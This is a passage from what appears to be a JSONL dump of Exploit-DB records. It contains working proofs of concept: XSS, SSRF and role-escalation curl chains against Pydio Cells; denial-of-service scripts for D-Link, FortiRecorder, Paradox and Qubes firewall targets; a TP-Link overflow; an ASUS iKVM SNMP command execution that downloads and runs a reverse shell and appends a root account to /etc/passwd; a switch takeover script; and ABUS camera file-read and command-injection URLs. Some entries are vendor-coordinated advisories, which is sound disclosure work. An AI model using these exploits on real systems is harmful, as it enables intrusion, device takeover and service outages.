'gatewaysecret',\n s3ForcePathStyle: !0,\n httpOptions: {\n timeout: PydioApi.getMultipartUploadTimeout()\n }\n});\n------------------------------------------------------------------------\n\nWith this information it is possible to change the URL parameter\n\"response-content-disposition\" to the value \"inline\" and then calculate\na valid signature for the resulting URL. Furthermore, the content type of\nthe response can be changed to \"text/html\" by also adding the URL\nparameter \"response-content-type\" with that value. This would result in\na URL like the following for the previously shown example URL:\n\nhttps://example.com/io/xss/xss.html?\n AWSAccessKeyId=gateway\n &Expires=1682495668\n &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D\n &response-content-disposition=inline\n &response-content-type=text%2Fhtml\n &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]\n\nUpon opening the URL in a browser, the HTML included in the file is\ninterpreted and any JavaScript code is run.\n\nProof of Concept\n================\n\nUpload a HTML file into an arbitrary location of a Pydio Cells instance.\nFor example with the following contents:\n\n------------------------------------------------------------------------\n\n \n

Cross-Site Scriping

\n \n \n\n------------------------------------------------------------------------\n\nThe contained JavaScript code reads the JWT access token for Pydio Cells\nfrom the browser's local storage object and opens a message box. Instead\nof just displaying the JWT, it could also be sent to an attacker. The\nfollowing JavaScript function can then be run within the browser's\ndeveloper console to generate a presigned URL for the HTML file:\n\n------------------------------------------------------------------------\nasync function getPresignedURL(path) {\n let client = PydioApi.getClient();\n let node = new AjxpNode(path);\n let metadata = {Bucket: \"io\", ResponseContentDisposition: \"inline\", Key: path, ResponseContentType: \"text/html\"};\n let url = await client.buildPresignedGetUrl(node, null, \"text/html\", metadata);\n\n return url;\n}\n\nawait getPresignedURL(\"xss/xss.html\");\n------------------------------------------------------------------------\n\nThe code has to be run in context of Pydio Cells while being logged in.\nIf the resulting URL is opened in a browser, the JavaScript code\ncontained in the HTML file is run. If the attack is conducted in the\ndescribed way, the JWT of the attacker is exposed through the URL.\nHowever, this can be circumvented by first generating a public URL\nfor the file and then constructing the presigned URL based on the\nresulting download URL.\n\n\nWorkaround\n==========\n\nNo workaround known.\n\n\nFix\n===\n\nUpgrade Pydio Cells to a version without the vulnerability.\n\n\nSecurity Risk\n=============\n\nAttackers that can upload files to a", "cve_id": "CVE-2023-32751", "source": "exploitdb", "timestamp": "2023-05-31T00:00:00+00:00"} {"id": "2ce32714d06390950dd0", "text": "Pydio Cells 4.1.2 - Server-Side Request Forgery\n\nExploit Title: Pydio Cells 4.1.2 - Server-Side Request Forgery\nAffected Versions: 4.1.2 and earlier versions\nFixed Versions: 4.2.0, 4.1.3, 3.0.12\nVulnerability Type: Server-Side Request Forgery\nSecurity Risk: medium\nVendor URL: https://pydio.com/\nVendor Status: notified\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-005\nAdvisory Status: published\nCVE: CVE-2023-32750\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32750\n\n\nIntroduction\n============\n\n\"Pydio Cells is an open-core, self-hosted Document Sharing and\nCollaboration platform (DSC) specifically designed for organizations\nthat need advanced document sharing and collaboration without security\ntrade-offs or compliance issues.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nUsing the REST-API of Pydio Cells it is possible to start jobs. For\nexample, when renaming a file or folder an HTTP request similar to the\nfollowing is sent:\n\n------------------------------------------------------------------------\nPUT /a/jobs/user/move HTTP/2\nHost: example.com\nUser-Agent: agent\nAccept: application/json\nAuthorization: Bearer G4ZRN[...]\nContent-Type: application/json\nContent-Length: 140\n\n{\n \"JobName\": \"move\",\n \"JsonParameters\": \"{\\\"nodes\\\":[\\\"cell/file.txt\\\"],\\\"target\\\":\\\"cell/renamed.txt\\\",\\\"targetParent\\\":false}\"\n}\n------------------------------------------------------------------------\n\nThe body contains a JSON object with a job name and additional\nparameters for the job. Besides the \"move\" job, also a job with the name\n\"remote-download\" exists. It takes two additional parameters: \"urls\" and\n\"target\". In the \"urls\" parameter, a list of URLs can be specified and in\nthe parameter \"target\" a path can be specified in which to save the\nresponse. When the job is started, HTTP GET requests are sent from the\nPydio Cells server to the specified URLs. The responses are saved into a\nfile, which are uploaded to the specified folder within Pydio Cells.\nPotential errors are transmitted in a WebSocket channel, which can be\nopened through the \"/ws/event\" endpoint.\n\n\nProof of Concept\n================\n\nLog into Pydio Cells and retrieve the JWT from the HTTP requests. Then,\nrun the following commands to start a \"remote-download\" job to trigger\nan HTTP request:\n\n------------------------------------------------------------------------\n$ export JWT=\"\"\n\n$ echo '{\"urls\": [\"http://localhost:8000/internal.html\"], \"target\": \"personal-files\"}' \\\n| jq '{\"JobName\": \"remote-download\", \"JsonParameters\": (. | tostring)}' \\\n| tee remote-download.json\n\n$ curl --header \"Authorization: Bearer $JWT\" \\\n--header 'Content-Type: application/json' \\\n--request PUT \\\n--data @remote-download.json 'https://example.com/a/jobs/user/remote-download'\n------------------------------------------------------------------------\n\nThe URL in the JSON document specifies which URL to request. The \"target\"\nfield in the same document specifies into which folder the response is saved.\nAfterwards, the response is contained in a file in the specified folder.\nPotential errors are communicated through the WebSocket channel.\n\n\nWorkaround\n==========\n\nLimit the services which can be reached by the Pydio Cells server, for\nexample using an outbound firewall.\n\n\nFix\n===\n\nUpgrade Pydio Cells to a version without the vulnerability.\n\n\nSecurity Risk\n=============\n\nThe risk is highly dependent on the environment in which the attacked\nPydio Cells instance runs. If there are any internal HTTP services which\nexpose sensitive data on the same machine or within the same network,\nthe server-side request forgery vulnerability could pose a significant\nrisk. In other circumstances, the risk could be negligible. Therefore,\noverall the vulnerability is rated as a medium risk.\n\n\nTimeline\n========\n\n2023-03-23 Vulnerability identified\n2023-05-02 Customer approved disclosure to vendor\n2023-05-02 Vendor notified\n2023-05-03 CVE ID requested\n2023-05-08 Vendor released fixed version\n2023-05-14 CVE ID assigned\n2023-05-16 Vendor asks for a few more days before the advisory is released\n2023-05-30 Advisory released\n\n\nReferences\n==========\n\n\n\nRedTeam Pentesting GmbH\n=======================\n\nRedTeam Pentesting offers individual penetration tests performed by a\nteam of specialised IT-security experts. Hereby, security weaknesses in\ncompany networks or products are uncovered and can be fixed immediately.\n\nAs there are only few experts in this field, RedTeam Pentesting wants to\nshare its knowledge and enhance the public knowledge with research in\nsecurity-related areas. The results are made available as public\nsecurity advisories.\n\nMore information about RedTeam Pentesting can be found at:\nhttps://www.redteam-pentesting.de/\n\n\nWorking at RedTeam Pentesting\n=============================\n\nRedTeam Pentesting is looking for penetration testers to join our team\nin Aachen, Germany. If you are interested please visit:\nhttps://jobs.redteam-pentesting.de/", "cve_id": "CVE-2023-32750", "source": "exploitdb", "timestamp": "2023-05-31T00:00:00+00:00"} {"id": "6c3f33be346379cddc9d", "text": "Pydio Cells 4.1.2 - Unauthorised Role Assignments\n\nExploit Title: Pydio Cells 4.1.2 - Unauthorised Role Assignments\nAffected Versions: 4.1.2 and earlier versions\nFixed Versions: 4.2.0, 4.1.3, 3.0.12\nVulnerability Type: Privilege Escalation\nSecurity Risk: high\nVendor URL: https://pydio.com/\nVendor Status: notified\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-003\nAdvisory Status: published\nCVE: CVE-2023-32749\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32749\n\n\nIntroduction\n============\n\n\"Pydio Cells is an open-core, self-hosted Document Sharing and\nCollaboration platform (DSC) specifically designed for organizations\nthat need advanced document sharing and collaboration without security\ntrade-offs or compliance issues.\"\n\n(from the vendor's homepage)\n\n\nMore Details\n============\n\nUsers can share cells or folders with other users on the same Pydio\ninstance. The web application allows to either select an already\nexisting user from a list or to create a new user by entering a new\nusername and password, if this functionality is enabled. When creating a\nnew user in this way, a HTTP PUT request like the following is sent:\n\n------------------------------------------------------------------------\nPUT /a/user/newuser HTTP/2\nHost: example.com\nUser-Agent: agent\nAuthorization: Bearer O48gvjD[...]\nContent-Type: application/json\nContent-Length: 628\nCookie: token=AO[...]\n\n{\n \"Attributes\": {\n \"profile\": \"shared\",\n \"parameter:core.conf:lang\": \"\\\"en-us\\\"\",\n \"send_email\": \"false\"\n },\n \"Roles\": [],\n \"Login\": \"newuser\",\n \"Password\": \"secret!\",\n \"GroupPath\": \"/\",\n \"Policies\": [...]\n}\n------------------------------------------------------------------------\n\nThe JSON object sent in the body contains the username and password\nfor the user to be created and an empty list for the key \"Roles\". The\nresponse contains a JSON object similar to the following:\n\n------------------------------------------------------------------------\n{\n \"Uuid\": \"58811c4c-2286-4ca0-8e8a-14ab9dbca8ce\",\n \"GroupPath\": \"/\",\n \"Attributes\": {\n \"parameter:core.conf:lang\": \"\\\"en-us\\\"\",\n \"profile\": \"shared\"\n },\n \"Roles\": [\n {\n \"Uuid\": \"EXTERNAL_USERS\",\n \"Label\": \"External Users\",\n \"Policies\": [...]\n },\n {\n \"Uuid\": \"58811c4c-2286-4ca0-8e8a-14ab9dbca8ce\",\n \"Label\": \"User newuser\",\n \"UserRole\": true,\n \"Policies\": [...]\n }\n ],\n \"Login\": \"newuser\",\n \"Policies\": [....],\n \"PoliciesContextEditable\": true\n}\n------------------------------------------------------------------------\n\nThe key \"Roles\" now contains a list with two objects, which seem to be\napplied by default. The roles list in the HTTP request can be\nmodified to contain a list of all available UUIDs for roles, which can\nbe obtained by using the user search functionality. This results in a\nnew user account with all roles applied. By performing a login as the\nnewly created user, access to all cells and non-personal workspaces of\nthe whole Pydio instance is granted.\n\n\nProof of Concept\n================\n\nLogin to the Pydio Cells web interface with a regular user and retrieve\nthe JWT from the HTTP requests. This can either be done using an HTTP\nattack proxy or using the browser's developer tools. Subsequently, curl [1]\ncan be used as follows to retrieve a list of all users and their roles:\n\n------------------------------------------------------------------------\n$ export JWT=\"\"\n$ curl --silent \\\n--header \"Authorization: Bearer $TOKEN\" \\\n--header 'Content-Type: application/json' \\\n--data '{}' \\\nhttps://example.com/a/user | tee all_users.json\n\n{\"Users\":[...]}\n------------------------------------------------------------------------\n\nAfterwards, jq [2] can be used to create a JSON document which can be\nsent to the Pydio REST-API in order to create the external user \"foobar\"\nwith the password \"hunter2\" and all roles assigned:\n\n------------------------------------------------------------------------\n$ jq '.Users[].Roles' all_users.json \\\n| jq -s 'flatten | .[].Uuid | {Uuid: .}' \\\n| jq -s 'unique' \\\n| jq '{\"Login\": \"foobar\", \"Password\": \"hunter2\", \"Attributes\":\n{\"profile\": \"shared\"}, \"Roles\": .}' \\\n| tee create_user.json\n\n{\n \"Login\": \"foobar\",\n \"Password\": \"hunter2\",\n \"Attributes\": {\n \"profile\": \"shared\"\n },\n \"Roles\": [...]\n}\n------------------------------------------------------------------------\n\nFinally, the following curl command can be issued to create the new external\nuser:\n\n------------------------------------------------------------------------\n$ curl --request PUT \\\n--silent \\\n--header \"Authorization: Bearer $JWT\" \\\n--header 'Content-Type: application/json' \\\n--data @create_user.json \\\nhttps://example.com/a/user/foobar\n------------------------------------------------------------------------\n\nNow, login with the newly created user to access all cells and\nnon-personal workspaces.\n\nWorkaround\n==========\n\nDisallow the creation of external users in the authentication settings.\n\n\nFix\n=", "cve_id": "CVE-2023-32749", "source": "exploitdb", "timestamp": "2023-05-31T00:00:00+00:00"} {"id": "d8d8d830bc66fd461694", "text": "DLink DIR 819 A1 - Denial of Service\n\n# Exploit Title: DLink DIR 819 A1 - Denial of Service\n# Date: 30th September, 2022\n# Exploit Author: @whokilleddb (https://twitter.com/whokilleddb)\n# Vendor Homepage: https://www.dlink.com/en/products/dir-819-wireless-ac750-dual-band-router\n# Version: DIR-819 (Firmware Version : 1.06 Hardware Version : A1)\n# Tested on: Firmware Version - 1.06 Hardware Version - A1\n# CVE : CVE-2022-40946\n#\n# Github: https://github.com/whokilleddb/dlink-dir-819-dos\n#\n# $ ./exploit.py -i 192.168.0.1\n# [+] DLink DIR-819 DoS exploit\n# [i] Address to attack: 192.168.0.1\n# [i] Using SSL: False\n# [i] Request Timeout: 30s\n# [i] Buffer Length: 19\n# [i] Payload: http://192.168.0.1/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token=6307226200704307522\n# [+] Exploit Successful!\n\n#!/usr/bin/env python3\nimport sys\nimport string\nimport urllib3\nimport requests\nimport argparse\nimport random\nimport socket\nfrom rich import print\n\n\n# Disable SSL Warnings\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n\n# Globals\nTIMEOUT = 30\n#BUFFER_LEN = 19\nBUFFER_LEN = 32\n\n# Class to exploit\nclass Exploit:\n def __init__(self, ip, is_ssl):\n \"\"\"Initialize the constructor\"\"\"\n\n self.ip = ip\n self.is_ssl = is_ssl\n\n _payload = f\"{self.ip}/cgi-bin/webproc?getpage=html/index.html&errorpage=html/error.html&var:language=en_us&var:menu=basic&var:page=Bas_wansum&var:sys_Token={''.join(x for x in random.choices(string.digits, k=BUFFER_LEN))}\"\n\n if self.is_ssl:\n self.payload = f\"https://{_payload}\"\n else:\n self.payload = f\"http://{_payload}\"\n\n\n def show(self):\n \"\"\"Show the parameters\"\"\"\n\n print(f\"[bold][[cyan]i[/cyan]] Address to attack: [green]{self.ip}[/green][/bold]\")\n print(f\"[bold][[cyan]i[/cyan]] Using SSL: [green]{self.is_ssl}[/green][/bold]\")\n print(f\"[bold][[cyan]i[/cyan]] Request Timeout: [green]{TIMEOUT}s[/green][/bold]\")\n print(f\"[bold][[cyan]i[/cyan]] Buffer Length: [green]{BUFFER_LEN}[/green][/bold]\")\n print(f\"[bold][[cyan]i[/cyan]] Payload: [green]{self.payload}[/green][/bold]\")\n\n\n def run(self):\n \"\"\"Run the exploit\"\"\"\n print(f\"[bold][[magenta]+[/magenta]] DLink DIR-819 DoS exploit[/bold]\")\n self.show()\n\n try:\n r = requests.get(self.payload, verify=False, timeout=TIMEOUT)\n if \"Internal Error\" in r.text:\n print(f\"[bold][[green]+[/green]] Exploit Successful![/bold]\")\n print(f\"[bold][[green]+[/green]] Router services must be down![/bold]\")\n else:\n print(f\"[bold][[red]![/red]] Exploit Failed :([/bold]\")\n\n except requests.exceptions.Timeout:\n print(f\"[bold][[green]+[/green]] Exploit Successful![/bold]\")\n\n except Exception as e:\n print(f\"Error occured as: {e}\")\n\n\ndef main():\n \"\"\"Main function to run\"\"\"\n\n parser = argparse.ArgumentParser(\n description=\"DLink DIR-819 Unauthenticated DoS\")\n parser.add_argument('-i', '--ip', required=True, help=\"IP of the router\")\n parser.add_argument('-s', '--ssl', required=False, action=\"store_true\")\n\n opts = parser.parse_args()\n\n try:\n ip = socket.gethostbyname(opts.ip)\n except socket.error:\n print(\"[bold red][!] Invalid IP address[/bold red]\", file=sys.stderr)\n return\n\n is_ssl = opts.ssl\n\n exploit = Exploit(ip, is_ssl)\n exploit.run()\n\n\nif __name__ == '__main__':\n main()", "cve_id": "CVE-2022-40946", "source": "exploitdb", "timestamp": "2023-03-25T00:00:00+00:00"} {"id": "454772efb0b9aaafc938", "text": "FortiRecorder 6.4.3 - Denial of Service\n\n# Exploit Title: FortiRecorder 6.4.3 - Denial of Service\n# Google Dork: N/A\n# Date: 13/03/2023\n# Exploit Author: Mohammed Adel\n# Vendor Homepage: https://www.fortinet.com/\n# Software Link: https://www.fortinet.com/products/network-based-video-security/forticam-fortirecorder\n# Version: 6.4.3 and below && 6.0.11 to 6.0.0\n# Tested on: Kali Linux\n# CVE : CVE-2022-41333\n# Security Advisory: https://www.fortiguard.com/psirt/FG-IR-22-388\n# Technical Analysis: https://medium.com/@0xpolar/cve-2022-41333-71eb289d60b5\n\nimport requests\nimport warnings\nimport sys\nfrom urllib.parse import unquote\nwarnings.filterwarnings('ignore', message='Unverified HTTPS request')\n\ndef POST(target, req_type, payload):\n print(\"[+] Target : \"+target)\n print(\"[+] Request Type: POST\")\n print(\"[+] Payload : \" +payload)\n post_url = target+\"/module/admin.fe\"\n post_headers = {\"User-Agent\": \"CVE-2022-41333\", \"Content-Type\": \"application/x-www-form-urlencoded\"}\n url_decoder = unquote(payload)\n full_payload = \"fewReq=\"+url_decoder\n while True:\n r = requests.post(post_url, headers=post_headers, data=full_payload, verify=False)\n if \"Failed: Access denied\" in r.text:\n print(\"[+] Payload Sent.\")\n else:\n print(\"[!] Something went wrong!\")\n print(r.text)\n\ndef GET(target, req_type, payload):\n print(\"[+] Target : \"+target)\n print(\"[+] Request Type: GET\")\n print(\"[+] Payload : \" +payload)\n while True:\n url = target+\"/module/admin.fe?fewReq=\"+payload\n headers = {\"User-Agent\": \"CVE-2022-41333\", \"Connection\": \"close\"}\n r = requests.get(url, headers=headers, verify=False)\n if \"Failed: Access denied\" in r.text:\n print(\"[+] Payload Sent.\")\n else:\n print(\"[!] Something went wrong!\")\n print(r.text)\n\n\nprint(\"[+] Starting ..\")\ntarget = str((sys.argv[1])) # https://fortirecorder.fortidemo.com\nreq_type = str((sys.argv[2])) # POST or GET\npayload = str((sys.argv[3])) # :B:JSsrJW16blB9dXp8ayJMZmxcfnJee3J2cTltem5efGt2cHEiLio5amx6bXF+cnoi\n\n\nif \"post\" in req_type.lower():\n if \"https\" in target.lower() or \"http\" in target.lower():\n POST(target, req_type, payload)\n else:\n print(\"[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]\")\nelif \"get\" in req_type.lower():\n if \"https\" in target.lower() or \"http\" in target.lower():\n GET(target, req_type, payload)\n else:\n print(\"[!] Invalid Target. [Ex: https://fortirecorder.fortidemo.com]\")\nelse:\n print(\"[!] Invalid Request Type.\")", "cve_id": "CVE-2022-41333", "source": "exploitdb", "timestamp": "2023-04-08T00:00:00+00:00"} {"id": "b5c0c840905f4f1de165", "text": "Paradox Security Systems IPR512 - Denial Of Service\n\n#!/bin/bash\n\n# Exploit Title: Paradox Security Systems IPR512 - Denial Of Service\n# Google Dork: intitle:\"ipr512 * - login screen\"\n# Date: 09-APR-2023\n# Exploit Author: Giorgi Dograshvili\n# Vendor Homepage: Paradox - Headquarters (https://www.paradox.com/Products/default.asp?PID=423)\n# Version: IPR512\n# CVE : CVE-2023-24709\n\n# Function to display banner message\ndisplay_banner() {\n echo \"******************************************************\"\n echo \"* *\"\n echo \"* PoC CVE-2023-24709 *\"\n echo \"* BE AWARE!!! RUNNING THE SCRIPT WILL MAKE *\"\n echo \"* A DAMAGING IMPACT ON THE SERVICE FUNCTIONING! *\"\n echo \"* by SlashXzerozero *\"\n echo \"* *\"\n echo \"******************************************************\"\n}\n\n# Call the function to display the banner\ndisplay_banner\n echo \"\"\n echo \"\"\n echo \"Please enter a domain name or IP address with or without port\"\nread -p \"(e.g. example.net or 192.168.12.34, or 192.168.56.78:999): \" domain\n\n# Step 2: Ask for user confirmation\nread -p \"This will DAMAGE the service. Do you still want it to proceed? (Y/n): \" confirm\nif [[ $confirm == \"Y\" || $confirm == \"y\" ]]; then\n # Display loading animation\n animation=(\"|\" \"/\" \"-\" \"\\\\\")\n index=0\n while [[ $index -lt 10 ]]; do\n echo -ne \"Loading ${animation[index]} \\r\"\n sleep 1\n index=$((index + 1))\n done\n\n # Use curl to send HTTP GET request with custom headers and timeout\n response=$(curl -i -s -k -X GET \\\n -H \"Host: $domain\" \\\n -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36\" \\\n -H \"Accept: */\" \\\n -H \"Referer: http://$domain/login.html\" \\\n -H \"Accept-Encoding: gzip, deflate\" \\\n -H \"Accept-Language: en-US,en;q=0.9\" \\\n -H \"Connection: close\" \\\n --max-time 10 \\\n \"http://$domain/login.cgi?log_user=%3c%2f%73%63%72%69%70%74%3e&log_passmd5=&r=3982\")\n\n # Check response for HTTP status code 200 and print result\n if [[ $response == *\"HTTP/1.1 200 OK\"* ]]; then\n echo -e \"\\nIt seems to be vulnerable! Please check the webpanel: http://$domain/login.html\"\n else\n echo -e \"\\nShouldn't be vulnerable! Please check the webpanel: http://$domain/login.html\"\n fi\nelse\n echo \"The script is stopped!.\"\nfi", "cve_id": "CVE-2023-24709", "source": "exploitdb", "timestamp": "2023-04-10T00:00:00+00:00"} {"id": "8b106c30647555a30ad8", "text": "qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)\n\n# Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)\n# Date: 2022-12-04\n# Exploit Author: Krzysztof Burghardt \n# Vendor Homepage: https://mirage.io/blog/MSA03\n# Software Link: https://github.com/mirage/qubes-mirage-firewall/releases\n# Version: >= 0.8.0 & < 0.8.4\n# Tested on: Qubes OS\n# CVE: CVE-2022-46770\n\n#PoC exploit from https://github.com/mirage/qubes-mirage-firewall/issues/166\n\n#!/usr/bin/env python3\n\nfrom socket import socket, AF_INET, SOCK_DGRAM\n\nTARGET = \"239.255.255.250\"\n\nPORT = 5353\n\nPAYLOAD = b'a' * 607\n\ns = socket(AF_INET, SOCK_DGRAM)\n\ns.sendto(PAYLOAD, (TARGET, PORT))", "cve_id": "CVE-2022-46770", "source": "exploitdb", "timestamp": "2023-03-31T00:00:00+00:00"} {"id": "b199439611d8013a6624", "text": "TP-Link TL-WR940N V4 - Buffer OverFlow\n\n# Exploit Title: TP-Link TL-WR940N V4 - Buffer OverFlow\n# Date: 2023-06-30\n# country: Iran\n# Exploit Author: Amirhossein Bahramizadeh\n# Category : hardware\n# Dork : /userRpm/WanDynamicIpV6CfgRpm\n# Tested on: Windows/Linux\n# CVE : CVE-2023-36355\n\nimport requests\n\n# Replace the IP address with the router's IP\nrouter_ip = '192.168.0.1'\n\n# Construct the URL with the vulnerable endpoint and parameter\nurl = f'http://{router_ip}/userRpm/WanDynamicIpV6CfgRpm?ipStart='\n\n# Replace the payload with a crafted payload that triggers the buffer overflow\npayload = 'A' * 5000 # Example payload, adjust the length as needed\n\n# Send the GET request with the crafted payload\nresponse = requests.get(url + payload)\n\n# Check the response status code\nif response.status_code == 200:\n print('Buffer overflow triggered successfully')\nelse:\n print('Buffer overflow not triggered')", "cve_id": "CVE-2023-36355", "source": "exploitdb", "timestamp": "2023-07-03T00:00:00+00:00"} {"id": "09b214ca373f7c31bdd0", "text": "ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)\n\n# Exploit Title: ASUS ASMB8 iKVM 1.14.51 - Remote Code Execution (RCE)\n# Date: 2023-02-16\n# Exploit Author: d1g@segfault.net for NetworkSEC [NWSSA-002-2023], SC\n# Vendor Homepage: https://servers.asus.com/search?q=ASMB8\n# Version/Model: ASMB8 iKVM Firmware <= 1.14.51 (probably others)\n# Tested on: Linux AMI2CFDA1C7570E 2.6.28.10-ami armv5tejl\n# CVE: CVE-2023-26602\n\n++++++++++++++++++++\n0x00 DESCRIPTION\n++++++++++++++++++++\nDuring a recent engagement, a remote server management interface has been\ndiscovered. Furthermore, SNMPv2 was found to be enabled, offering write\naccess to the private community, subsequently allowing us to introduce\nSNMP arbitrary extensions to achieve RCE.\nWe also found a hardcoded account sysadmin:superuser by cracking the\nshadow file (md5crypt) found on the system and identifed an \"anonymous\"\nuser w/ the same password, however a lock seems to be in place to prevent\nusing these credentials via SSH (running defshell as default shell).\n+++++++++++++++\n0x01 IMPACT\n+++++++++++++++\nBy exploiting SNMP arbitrary extension, we are able to run any command on\nthe system w/ root privileges, and we are able to introduce our own user\ncircumventing the defshell restriction for SSH.\n+++++++++++++++++++++++++++++++\n0x02 PROOF OF CONCEPT (PoC)\n+++++++++++++++++++++++++++++++\nAt first, we have to create required extensions on the system, e.g. via\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"[command]\"'\nand if everything is set, we can just run that command by\nsnmpbulkwalk -c public -v2c x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects\nwhich will execute our defined command and show us its output.\n+++++++++++++++++++++++++++++++\n0x03 SSH Remote Root Access\n+++++++++++++++++++++++++++++++\nThe identified RCE can be used to transfer a reverse tcp shell created\nby msfvenom for arm little-endian, e.g.\nmsfvenom -p linux/armle/shell_reverse_tcp LHOST=x.x.x.x LPORT=4444 -f elf -o rt.bin\nWe can now transfer the binary, adjust permissions and finally run it:\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"wget -O /var/tmp/rt.bin http://x.x.x.x/rt.bin\"'\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"chmod +x /var/tmp/rt.bin\"'\nsnmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c private x.x.x.x 'nsExtendStatus.\"cmd\"' = createAndGo 'nsExtendCommand.\"cmd\"' = /bin/sh 'nsExtendArgs.\"cmd\"' = '-c \"/var/tmp/rt.bin\"'\nAgain, we have to request execution of the lines in the MIB via:\nsnmpbulkwalk -c public -v2c x.x.x.x NET-SNMP-EXTEND-MIB::nsExtendObjects\nWe get a reverse connection from the host, and can now act on the local system\nto easily echo our own line into /etc/passwd:\necho d1g:OmE2EUpLJafIk:0:0:root:/root:/bin/sh >> /etc/passwd\nBy setting the standard shell to /bin/sh, we are able to get a SSH root\nshell into the system, effectively circumventing the defshell restriction.\n$ sshpass -p xxxx ssh x.x.x.x -oHostKeyAlgorithms=+ssh-dss -l d1g\nBusyBox v1.13.2 (2017-07-11 18:39:07 CST) built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n# uname -a\nLinux AMI2CFDA1C7570E 2.6.28.10-ami #1 Tue Jul 11 18:49:20 CST 2017 armv5tejl unknown\n# uptime\n15:01:45 up 379 days, 23:33, load average: 2.63, 1.57, 1.25\n# head -n 1 /etc/shadow\nsysadmin:$1$A17c6z5w$5OsdHjBn1pjvN6xXKDckq0:14386:0:99999:7:::\n---\n#EOF", "cve_id": "CVE-2023-26602", "source": "exploitdb", "timestamp": "2025-04-16T00:00:00+00:00"} {"id": "9777175d2997df793fc2", "text": "FS-S3900-24T4S - Privilege Escalation\n\n# Exploit Title: FS-S3900-24T4S Privilege Escalation\n# Date: 29/04/2023\n# Exploit Author: Daniele Linguaglossa & Alberto Bruscino\n# Vendor Homepage: https://www.fs.com/\n# Software Link: not available\n# Version: latest\n# Tested on: latest\n# CVE : CVE-2023-30350\n\nimport sys\nimport telnetlib\n\n\ndef exploit(args):\n print(args)\n if len(args) != 1:\n print(f\"Usage: {sys.argv[0]} \")\n sys.exit(1)\n else:\n ip = args[0]\n try:\n with telnetlib.Telnet(ip, 23) as tn:\n try:\n tn.read_until(b\"Username: \")\n tn.write(b\"guest\\r\\n\")\n tn.read_until(b\"Password: \")\n tn.write(b\"guest\\r\\n\")\n tn.read_until(b\">\")\n tn.write(b\"enable\\r\\n\")\n tn.read_until(b\"Password: \")\n tn.write(b\"super\\r\\n\")\n tn.read_until(b\"#\")\n tn.write(b\"configure terminal\\r\\n\")\n tn.read_until(b\"(config)#\")\n tn.write(b\"username admin nopassword\\r\\n\")\n tn.read_until(b\"(config)#\")\n print(\n \"Exploit success, you can now login with username: admin and password: \")\n tn.close()\n except KeyboardInterrupt:\n print(\"Exploit failed\")\n tn.close()\n except ConnectionRefusedError:\n print(\"Connection refused\")\n\n\nif __name__ == \"__main__\":\n exploit(sys.argv[1:])", "cve_id": "CVE-2023-30350", "source": "exploitdb", "timestamp": "2023-05-02T00:00:00+00:00"} {"id": "6ad011970758ba7adda2", "text": "ABUS Security Camera TVIP 20000-21150 - LFI_ RCE and SSH Root Access\n\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n# Exploit Title:\tABUS Security Camera TVIP 20000-21150 - LFI, RCE and SSH Root Access\n# Date:\t\t\t2023-02-16\n# Exploit Author:\td1g@segfault.net for NetworkSEC [NWSSA-001-2023]\n# Vendor Homepage:\thttps://www.abus.com\n# Version/Model:\tTVIP 20000-21150 (probably many others)\n# Tested on:\t\tGM ARM Linux 2.6, Server: Boa/0.94.14rc21\n# CVE:\t\t\tCVE-2023-26609\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n\n++++++++++++++++++++\n0x00\tDESCRIPTION\n++++++++++++++++++++\n\nDuring a recent engagement, a network camera was discovered. Web fuzzing\nrevealed a URL of\n\n/device\n\ncontaining output about running processes as well as a pretty complete\nlisting of webcontent which inevitably arose our suspicion.\n\nMore research revealed that files w/ known LFI and RCE issues were present,\nleading to either arbitrary file reads or remote code execution, both w/\nroot privileges and using known default credentials (either admin:admin\nor manufacture:erutcafunam).\n\nAfter closer filesystem inspection, RCE led to a remote root SSH shell.\n\n\n+++++++++++++++\n0x01\tIMPACT\n+++++++++++++++\n\nThe LFI vulnerability can be exploited using a URL of:\n\n/cgi-bin/admin/fileread?READ.filePath=[filename]\n\nand is able to read any file on the system.\n\n\nThe RCE vulnerability originates from a command injection and may be\nexploited by calling a URL of:\n\n/cgi-bin/mft/wireless_mft?ap=irrelevant;[command]\n\n(as classy as it can get, we can also use the pipe \"|\" instead, and\nlinefeed a.k.a. \"%0a\" works as well)\n\neffectively giving us remote code (or rather command) execution.\n\n\n+++++++++++++++++++++++++++++++\n0x02 \tPROOF OF CONCEPT (PoC)\n+++++++++++++++++++++++++++++++\n\n#!/bin/bash\n#\n# ABUS Security Camera LFI\n#\ncurl -iv \"http://admin:admin@a.b.c.d/cgi-bin/admin/fileread?READ.filePath=/$1\"\n\nThe script can be called like:\n\n./LFI.sh /etc/passwd\n\nto display the contents of the 